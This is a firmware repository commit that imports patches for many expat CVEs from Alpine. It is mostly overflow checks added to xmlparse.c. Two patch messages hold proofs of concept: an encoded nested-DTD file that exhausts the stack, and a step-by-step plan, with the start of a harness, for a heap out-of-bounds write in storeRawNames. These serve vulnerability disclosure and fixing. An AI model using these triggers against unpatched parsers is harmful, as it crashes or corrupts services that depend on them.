expat: import patches for CVEs

* import patches for CVEs from alpine 3.13

CVE-2021-45960, CVE-2021-46143, CVE-2022-22822, CVE-2022-22823, CVE-2022-22824,
CVE-2022-22825, CVE-2022-22826, CVE-2022-22827, CVE-2022-23852, CVE-2022-23990,
CVE-2022-25235, CVE-2022-25236, CVE-2022-25313, CVE-2022-25314, CVE-2022-25315

Signed-off-by: Michal Vasilek <michal.vasilek@nic.cz>
(cherry picked from commit 584c0c4378)
This commit is contained in:
Michal Vasilek 2022-02-23 21:34:58 +01:00 committed by Josef Schlehofer
parent 448eb6e4b9
commit 79db9a8e24
No known key found for this signature in database
GPG Key ID: B950216FE4329F4C
11 changed files with 866 additions and 2 deletions

View File

@ -7,9 +7,9 @@ include $(TOPDIR)/rules.mk
PKG_NAME:=expat
PKG_VERSION:=2.2.10
PKG_RELEASE:=1
PKG_RELEASE:=2
PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.xz
PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION)-RENAMED-VULNERABLE-PLEASE-USE-2.4.1-INSTEAD.tar.xz
PKG_SOURCE_URL:=@SF/expat
PKG_HASH:=5dfe538f8b5b63f03e98edac520d7d9a6a4d22e482e5c96d4d06fcc5485c25f2

View File

@ -0,0 +1,57 @@
From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Mon, 27 Dec 2021 20:15:02 +0100
Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
storeAtts (CVE-2021-45960)
---
expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
1 file changed, 29 insertions(+), 2 deletions(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -3240,7 +3240,13 @@ storeAtts(XML_Parser parser, const ENCOD
if (nPrefixes) {
int j; /* hash table index */
unsigned long version = parser->m_nsAttsVersion;
- int nsAttsSize = (int)1 << parser->m_nsAttsPower;
+
+ /* Detect and prevent invalid shift */
+ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
+ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
unsigned char oldNsAttsPower = parser->m_nsAttsPower;
/* size of hash table must be at least 2 * (# of prefixed attributes) */
if ((nPrefixes << 1)
@@ -3251,7 +3257,28 @@ storeAtts(XML_Parser parser, const ENCOD
;
if (parser->m_nsAttsPower < 3)
parser->m_nsAttsPower = 3;
- nsAttsSize = (int)1 << parser->m_nsAttsPower;
+
+ /* Detect and prevent invalid shift */
+ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
+ /* Restore actual size of memory in m_nsAtts */
+ parser->m_nsAttsPower = oldNsAttsPower;
+ return XML_ERROR_NO_MEMORY;
+ }
+
+ nsAttsSize = 1u << parser->m_nsAttsPower;
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
+ /* Restore actual size of memory in m_nsAtts */
+ parser->m_nsAttsPower = oldNsAttsPower;
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
nsAttsSize * sizeof(NS_ATT));
if (! temp) {

View File

@ -0,0 +1,41 @@
From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Sat, 25 Dec 2021 20:52:08 +0100
Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
doProlog (CVE-2021-46143)
---
expat/lib/xmlparse.c | 15 +++++++++++++++
1 file changed, 15 insertions(+)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -4803,6 +4803,11 @@ doProlog(XML_Parser parser, const ENCODI
if (parser->m_prologState.level >= parser->m_groupSize) {
if (parser->m_groupSize) {
{
+ /* Detect and prevent integer overflow */
+ if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
char *const new_connector = (char *)REALLOC(
parser, parser->m_groupConnector, parser->m_groupSize *= 2);
if (new_connector == NULL) {
@@ -4813,6 +4818,16 @@ doProlog(XML_Parser parser, const ENCODI
}
if (dtd->scaffIndex) {
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
int *const new_scaff_index = (int *)REALLOC(
parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
if (new_scaff_index == NULL)

View File

@ -0,0 +1,248 @@
From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Thu, 30 Dec 2021 22:46:03 +0100
Subject: [PATCH] lib: Prevent integer overflow at multiple places
(CVE-2022-22822 to CVE-2022-22827)
The involved functions are:
- addBinding (CVE-2022-22822)
- build_model (CVE-2022-22823)
- defineAttribute (CVE-2022-22824)
- lookup (CVE-2022-22825)
- nextScaffoldPart (CVE-2022-22826)
- storeAtts (CVE-2022-22827)
---
expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++-
1 file changed, 151 insertions(+), 2 deletions(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -3087,13 +3087,38 @@ storeAtts(XML_Parser parser, const ENCOD
/* get the attributes from the tokenizer */
n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts);
+
+ /* Detect and prevent integer overflow */
+ if (n > INT_MAX - nDefaultAtts) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
if (n + nDefaultAtts > parser->m_attsSize) {
int oldAttsSize = parser->m_attsSize;
ATTRIBUTE *temp;
#ifdef XML_ATTR_INFO
XML_AttrInfo *temp2;
#endif
+
+ /* Detect and prevent integer overflow */
+ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE)
+ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE;
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) {
+ parser->m_attsSize = oldAttsSize;
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts,
parser->m_attsSize * sizeof(ATTRIBUTE));
if (temp == NULL) {
@@ -3102,6 +3127,17 @@ storeAtts(XML_Parser parser, const ENCOD
}
parser->m_atts = temp;
#ifdef XML_ATTR_INFO
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+# if UINT_MAX >= SIZE_MAX
+ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) {
+ parser->m_attsSize = oldAttsSize;
+ return XML_ERROR_NO_MEMORY;
+ }
+# endif
+
temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo,
parser->m_attsSize * sizeof(XML_AttrInfo));
if (temp2 == NULL) {
@@ -3436,9 +3472,31 @@ storeAtts(XML_Parser parser, const ENCOD
tagNamePtr->prefixLen = prefixLen;
for (i = 0; localPart[i++];)
; /* i includes null terminator */
+
+ /* Detect and prevent integer overflow */
+ if (binding->uriLen > INT_MAX - prefixLen
+ || i > INT_MAX - (binding->uriLen + prefixLen)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
n = i + binding->uriLen + prefixLen;
if (n > binding->uriAlloc) {
TAG *p;
+
+ /* Detect and prevent integer overflow */
+ if (n > INT_MAX - EXPAND_SPARE) {
+ return XML_ERROR_NO_MEMORY;
+ }
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char));
if (! uri)
return XML_ERROR_NO_MEMORY;
@@ -3534,6 +3592,21 @@ addBinding(XML_Parser parser, PREFIX *pr
if (parser->m_freeBindingList) {
b = parser->m_freeBindingList;
if (len > b->uriAlloc) {
+ /* Detect and prevent integer overflow */
+ if (len > INT_MAX - EXPAND_SPARE) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
XML_Char *temp = (XML_Char *)REALLOC(
parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE));
if (temp == NULL)
@@ -3546,6 +3619,21 @@ addBinding(XML_Parser parser, PREFIX *pr
b = (BINDING *)MALLOC(parser, sizeof(BINDING));
if (! b)
return XML_ERROR_NO_MEMORY;
+
+ /* Detect and prevent integer overflow */
+ if (len > INT_MAX - EXPAND_SPARE) {
+ return XML_ERROR_NO_MEMORY;
+ }
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
b->uri
= (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE));
if (! b->uri) {
@@ -5826,7 +5914,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTR
}
} else {
DEFAULT_ATTRIBUTE *temp;
+
+ /* Detect and prevent integer overflow */
+ if (type->allocDefaultAtts > INT_MAX / 2) {
+ return 0;
+ }
+
int count = type->allocDefaultAtts * 2;
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) {
+ return 0;
+ }
+#endif
+
temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts,
(count * sizeof(DEFAULT_ATTRIBUTE)));
if (temp == NULL)
@@ -6477,8 +6582,20 @@ lookup(XML_Parser parser, HASH_TABLE *ta
/* check for overflow (table is half full) */
if (table->used >> (table->power - 1)) {
unsigned char newPower = table->power + 1;
+
+ /* Detect and prevent invalid shift */
+ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) {
+ return NULL;
+ }
+
size_t newSize = (size_t)1 << newPower;
unsigned long newMask = (unsigned long)newSize - 1;
+
+ /* Detect and prevent integer overflow */
+ if (newSize > (size_t)(-1) / sizeof(NAMED *)) {
+ return NULL;
+ }
+
size_t tsize = newSize * sizeof(NAMED *);
NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize);
if (! newV)
@@ -6828,6 +6945,20 @@ nextScaffoldPart(XML_Parser parser) {
if (dtd->scaffCount >= dtd->scaffSize) {
CONTENT_SCAFFOLD *temp;
if (dtd->scaffold) {
+ /* Detect and prevent integer overflow */
+ if (dtd->scaffSize > UINT_MAX / 2u) {
+ return -1;
+ }
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) {
+ return -1;
+ }
+#endif
+
temp = (CONTENT_SCAFFOLD *)REALLOC(
parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD));
if (temp == NULL)
@@ -6897,8 +7028,26 @@ build_model(XML_Parser parser) {
XML_Content *ret;
XML_Content *cpos;
XML_Char *str;
- int allocsize = (dtd->scaffCount * sizeof(XML_Content)
- + (dtd->contentStringLen * sizeof(XML_Char)));
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) {
+ return NULL;
+ }
+ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) {
+ return NULL;
+ }
+#endif
+ if (dtd->scaffCount * sizeof(XML_Content)
+ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) {
+ return NULL;
+ }
+
+ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content)
+ + (dtd->contentStringLen * sizeof(XML_Char)));
ret = (XML_Content *)MALLOC(parser, allocsize);
if (! ret)

View File

@ -0,0 +1,25 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40
From 847a645152f5ebc10ac63b74b604d0c1a79fae40 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Sat, 22 Jan 2022 17:48:00 +0100
Subject: [PATCH] lib: Detect and prevent integer overflow in XML_GetBuffer
(CVE-2022-23852)
---
expat/lib/xmlparse.c | 5 +++++
1 file changed, 5 insertions(+)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -1971,6 +1971,11 @@ XML_GetBuffer(XML_Parser parser, int len
keep = (int)EXPAT_SAFE_PTR_DIFF(parser->m_bufferPtr, parser->m_buffer);
if (keep > XML_CONTEXT_BYTES)
keep = XML_CONTEXT_BYTES;
+ /* Detect and prevent integer overflow */
+ if (keep > INT_MAX - neededSize) {
+ parser->m_errorCode = XML_ERROR_NO_MEMORY;
+ return NULL;
+ }
neededSize += keep;
#endif /* defined XML_CONTEXT_BYTES */
if (neededSize

View File

@ -0,0 +1,40 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/ede41d1e186ed2aba88a06e84cac839b770af3a1
From ede41d1e186ed2aba88a06e84cac839b770af3a1 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Wed, 26 Jan 2022 02:36:43 +0100
Subject: [PATCH] lib: Prevent integer overflow in doProlog (CVE-2022-23990)
The change from "int nameLen" to "size_t nameLen"
addresses the overflow on "nameLen++" in code
"for (; name[nameLen++];)" right above the second
change in the patch.
---
expat/lib/xmlparse.c | 10 ++++++++--
1 file changed, 8 insertions(+), 2 deletions(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -5126,7 +5126,7 @@ doProlog(XML_Parser parser, const ENCODI
if (dtd->in_eldecl) {
ELEMENT_TYPE *el;
const XML_Char *name;
- int nameLen;
+ size_t nameLen;
const char *nxt
= (quant == XML_CQUANT_NONE ? next : next - enc->minBytesPerChar);
int myindex = nextScaffoldPart(parser);
@@ -5142,7 +5142,13 @@ doProlog(XML_Parser parser, const ENCODI
nameLen = 0;
for (; name[nameLen++];)
;
- dtd->contentStringLen += nameLen;
+
+ /* Detect and prevent integer overflow */
+ if (nameLen > UINT_MAX - dtd->contentStringLen) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
+ dtd->contentStringLen += (unsigned)nameLen;
if (parser->m_elementDeclHandler)
handleDefault = XML_FALSE;
}

View File

@ -0,0 +1,41 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6
From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Tue, 8 Feb 2022 04:32:20 +0100
Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
---
expat/lib/xmltok_impl.c | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
--- a/lib/xmltok_impl.c
+++ b/lib/xmltok_impl.c
@@ -61,7 +61,7 @@
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
- if (! IS_NAME_CHAR(enc, ptr, n)) { \
+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) { \
*nextTokPtr = ptr; \
return XML_TOK_INVALID; \
} \
@@ -90,7 +90,7 @@
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
- if (! IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) { \
*nextTokPtr = ptr; \
return XML_TOK_INVALID; \
} \
@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, c
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
+ if (IS_INVALID_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
if (IS_NMSTRT_CHAR(enc, ptr, n)) { \
ptr += n; \
tok = XML_TOK_NAME; \

View File

@ -0,0 +1,31 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/a2fe525e660badd64b6c557c2b1ec26ddc07f6e4
From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Sat, 12 Feb 2022 01:09:29 +0100
Subject: [PATCH] lib: Protect against malicious namespace declarations
(CVE-2022-25236)
---
expat/lib/xmlparse.c | 11 +++++++++++
1 file changed, 11 insertions(+)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -3581,6 +3581,17 @@ addBinding(XML_Parser parser, PREFIX *pr
if (! mustBeXML && isXMLNS
&& (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
isXMLNS = XML_FALSE;
+
+ // NOTE: While Expat does not validate namespace URIs against RFC 3986,
+ // we have to at least make sure that the XML processor on top of
+ // Expat (that is splitting tag names by namespace separator into
+ // 2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
+ // by an attacker putting additional namespace separator characters
+ // into namespace declarations. That would be ambiguous and not to
+ // be expected.
+ if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
+ return XML_ERROR_SYNTAX;
+ }
}
isXML = isXML && len == xmlLen;
isXMLNS = isXMLNS && len == xmlnsLen;

View File

@ -0,0 +1,221 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/bbdfcfef4747d2d66e81c19f4a55e29e291aa171
From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:54:29 +0000
Subject: [PATCH] Prevent stack exhaustion in build_model
It is possible to trigger stack exhaustion in build_model function if
depth of nested children in DTD element is large enough. This happens
because build_node is a recursively called function within build_model.
The code has been adjusted to run iteratively. It uses the already
allocated heap space as temporary stack (growing from top to bottom).
Output is identical to recursive version. No new fields in data
structures were added, i.e. it keeps full API and ABI compatibility.
Instead the numchildren variable is used to temporarily keep the
index of items (uint vs int).
Documentation and readability improvements kindly added by Sebastian.
Proof of Concept:
1. Compile poc binary which parses XML file line by line
```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdio.h>
XML_Parser parser;
static void XMLCALL
dummy_element_decl_handler(void *userData, const XML_Char *name,
XML_Content *model) {
XML_FreeContentModel(parser, model);
}
int main(int argc, char *argv[]) {
FILE *fp;
char *p = NULL;
size_t s = 0;
ssize_t l;
if (argc != 2)
errx(1, "usage: poc poc.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "XML_ParserCreate");
XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
if ((fp = fopen(argv[1], "r")) == NULL)
err(1, "fopen");
while ((l = getline(&p, &s, fp)) > 0)
if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
errx(1, "XML_Parse");
XML_ParserFree(parser);
free(p);
fclose(fp);
return 0;
}
EOF
cc -std=c11 -D_POSIX_C_SOURCE=200809L -o poc poc.c -lexpat
```
2. Create XML file with a lot of nested groups in DTD element
```
cat > poc.xml.zst.b64 << EOF
KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
EOF
base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
```
3. Run Proof of Concept
```
./poc poc.xml
```
Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
---
expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
1 file changed, 79 insertions(+), 37 deletions(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -7012,44 +7012,15 @@ nextScaffoldPart(XML_Parser parser) {
return next;
}
-static void
-build_node(XML_Parser parser, int src_node, XML_Content *dest,
- XML_Content **contpos, XML_Char **strpos) {
- DTD *const dtd = parser->m_dtd; /* save one level of indirection */
- dest->type = dtd->scaffold[src_node].type;
- dest->quant = dtd->scaffold[src_node].quant;
- if (dest->type == XML_CTYPE_NAME) {
- const XML_Char *src;
- dest->name = *strpos;
- src = dtd->scaffold[src_node].name;
- for (;;) {
- *(*strpos)++ = *src;
- if (! *src)
- break;
- src++;
- }
- dest->numchildren = 0;
- dest->children = NULL;
- } else {
- unsigned int i;
- int cn;
- dest->numchildren = dtd->scaffold[src_node].childcnt;
- dest->children = *contpos;
- *contpos += dest->numchildren;
- for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
- i++, cn = dtd->scaffold[cn].nextsib) {
- build_node(parser, cn, &(dest->children[i]), contpos, strpos);
- }
- dest->name = NULL;
- }
-}
-
static XML_Content *
build_model(XML_Parser parser) {
+ /* Function build_model transforms the existing parser->m_dtd->scaffold
+ * array of CONTENT_SCAFFOLD tree nodes into a new array of
+ * XML_Content tree nodes followed by a gapless list of zero-terminated
+ * strings. */
DTD *const dtd = parser->m_dtd; /* save one level of indirection */
XML_Content *ret;
- XML_Content *cpos;
- XML_Char *str;
+ XML_Char *str; /* the current string writing location */
/* Detect and prevent integer overflow.
* The preprocessor guard addresses the "always false" warning
@@ -7075,10 +7046,81 @@ build_model(XML_Parser parser) {
if (! ret)
return NULL;
- str = (XML_Char *)(&ret[dtd->scaffCount]);
- cpos = &ret[1];
+ /* What follows is an iterative implementation of what was previously done
+ * recursively in a dedicated function called "build_node". The old recursive
+ * build_node could be forced into stack exhaustion by input as small as a
+ * few megabytes, and so that was a security issue. Hence, a function call
+ * stack is now avoided by resolving the recursion into iteration.
+ *
+ * The iterative approach works as follows:
+ *
+ * - We use space in the target array for building a temporary stack structure
+ * while that space is still unused.
+ * The stack grows from the array's end downwards and the "actual data"
+ * grows from the start upwards, sequentially.
+ * (Because stack grows downwards, pushing onto the stack is a decrement
+ * while popping off the stack is an increment.)
+ *
+ * - A stack element appears as a regular XML_Content node on the outside,
+ * but only uses a single field -- numchildren -- to store the source
+ * tree node array index. These are the breadcrumbs leading the way back
+ * during pre-order (node first) depth-first traversal.
+ *
+ * - The reason we know the stack will never grow into (or overlap with)
+ * the area with data of value at the start of the array is because
+ * the overall number of elements to process matches the size of the array,
+ * and the sum of fully processed nodes and yet-to-be processed nodes
+ * on the stack, cannot be more than the total number of nodes.
+ * It is possible for the top of the stack and the about-to-write node
+ * to meet, but that is safe because we get the source index out
+ * before doing any writes on that node.
+ */
+ XML_Content *dest = ret; /* tree node writing location, moves upwards */
+ XML_Content *const destLimit = &ret[dtd->scaffCount];
+ XML_Content *const stackBottom = &ret[dtd->scaffCount];
+ XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
+ str = (XML_Char *)&ret[dtd->scaffCount];
+
+ /* Push source tree root node index onto the stack */
+ (--stackTop)->numchildren = 0;
+
+ for (; dest < destLimit; dest++) {
+ /* Pop source tree node index off the stack */
+ const int src_node = (int)(stackTop++)->numchildren;
+
+ /* Convert item */
+ dest->type = dtd->scaffold[src_node].type;
+ dest->quant = dtd->scaffold[src_node].quant;
+ if (dest->type == XML_CTYPE_NAME) {
+ const XML_Char *src;
+ dest->name = str;
+ src = dtd->scaffold[src_node].name;
+ for (;;) {
+ *str++ = *src;
+ if (! *src)
+ break;
+ src++;
+ }
+ dest->numchildren = 0;
+ dest->children = NULL;
+ } else {
+ unsigned int i;
+ int cn;
+ dest->name = NULL;
+ dest->numchildren = dtd->scaffold[src_node].childcnt;
+ dest->children = &dest[1];
+
+ /* Push children to the stack
+ * in a way where the first child ends up at the top of the
+ * (downwards growing) stack, in order to be processed first. */
+ stackTop -= dest->numchildren;
+ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
+ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
+ (stackTop + i)->numchildren = (unsigned int)cn;
+ }
+ }
+ }
- build_node(parser, 0, ret, &cpos, &str);
return ret;
}

View File

@ -0,0 +1,23 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/d477fdd284468f2ab822024e75702f2c1b254f42
From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:56:57 +0000
Subject: [PATCH] Prevent integer overflow in copyString
The copyString function is only used for encoding string supplied by
the library user.
---
expat/lib/xmlparse.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -7149,7 +7149,7 @@ getElementType(XML_Parser parser, const
static XML_Char *
copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
- int charsRequired = 0;
+ size_t charsRequired = 0;
XML_Char *result;
/* First determine how long the string is */

View File

@ -0,0 +1,137 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/89214940efd13e3b83fa078fd70eb4dbdc04c4a5
From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:55:46 +0000
Subject: [PATCH] Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.
The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.
Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.
Expat can convert between different encodings. UTF-16 documents that
contain only ASCII-representable characters are twice as large as their
ASCII-encoded counterparts.
The proof of concept works by taking these three considerations into
account:
1. Move the m_buffer size slightly below a power of two by having a
short root node <a>. This allows the m_buffer to grow very close
to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
which only contains ASCII characters. UTF-16 always stores two
bytes per character while the tag name is converted to using only
one. Our attack node byte count must be a bit higher than
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
in sum can overflow INT_MAX.
Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.
Proof of Concept:
1. Compile expat with -fsanitize=address.
2. Create Proof of Concept binary which iterates through input
file 16 MB at once for better performance and easier integer
calculations:
```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdlib.h>
#include <stdio.h>
#define CHUNK (16 * 1024 * 1024)
int main(int argc, char *argv[]) {
XML_Parser parser;
FILE *fp;
char *buf;
int i;
if (argc != 2)
errx(1, "usage: poc file.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "failed to create expat parser");
if ((fp = fopen(argv[1], "r")) == NULL) {
XML_ParserFree(parser);
err(1, "failed to open file");
}
if ((buf = malloc(CHUNK)) == NULL) {
fclose(fp);
XML_ParserFree(parser);
